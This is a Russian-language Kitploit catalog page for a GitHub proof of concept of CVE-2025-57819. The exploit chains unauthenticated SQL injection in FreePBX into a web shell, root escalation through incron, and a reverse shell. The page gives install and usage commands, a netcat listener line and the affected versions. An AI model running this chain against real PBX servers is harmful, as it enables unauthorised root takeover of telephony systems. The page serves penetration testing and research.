Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-57819-FreePBX-RCE2Root — Полная цепочка CVE-2025-57819 PoC для FreePBX 15, 16 и 17: неавторизованная SQL-инъекция до RCE и захвата root. | Kitploit
Инструменты/GitHubGitHub/ozcanpng/cve-2025-57819-freepbx-rce2root
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubozcanpng/cve-2025-57819-freepbx-rce2root

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-57819-FreePBX-RCE2Root

Полная цепочка CVE-2025-57819 PoC для FreePBX 15, 16 и 17: неавторизованная SQL-инъекция до RCE и захвата root.

Репозиторий
12 месяцев назадЕщё не проверено

CVE-2025-57819 — FreePBX SQL-инъекция → RCE → Root

Полноценный PoC для CVE-2025-57819. Неаутентифицированная ошибка на основе SQL-инъекции в модуле endpoint FreePBX, которая превращается в root shell через внедрение cron-задания и повышение привилегий с помощью incron.

Только для авторизованного тестирования и исследований. Не используйте против систем, которые вам не принадлежат.


Что делает

root@kitploit:~
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
  1. Извлекает информацию о БД через инъекцию на основе ошибок на /admin/ajax.php
  2. Внедряет cron-задание, которое записывает PHP-веб-шелл в корневую директорию веб-сервера
  3. Ожидает выполнения cron (~60 с), подтверждает RCE как asterisk
  4. Создает файл триггера incron, который запускает хук fwconsole от имени root
  5. Перехватывает обратный шелл на вашем слушателе

Установка

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt

Использование

root@kitploit:~
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]

Сначала запустите слушатель:

root@kitploit:~
nc -lvnp 9999

Затем запустите:

root@kitploit:~
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999

--cleanup удаляет веб-шелл и cron-задание после эксплуатации.


Затронутые версии

FreePBX с установленным модулем endpoint. Параметр brand в /admin/ajax.php передается без санитизации в SQL-запрос.

FreePBXИсправленная версия
15.x15.0.66
16.x16.0.89
17.x17.0.3

Ссылки

  • FreePBX Security Advisory GHSA-m42g-xg4c-5f3h
  • NVD — CVE-2025-57819

Автор

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Скачать инструмент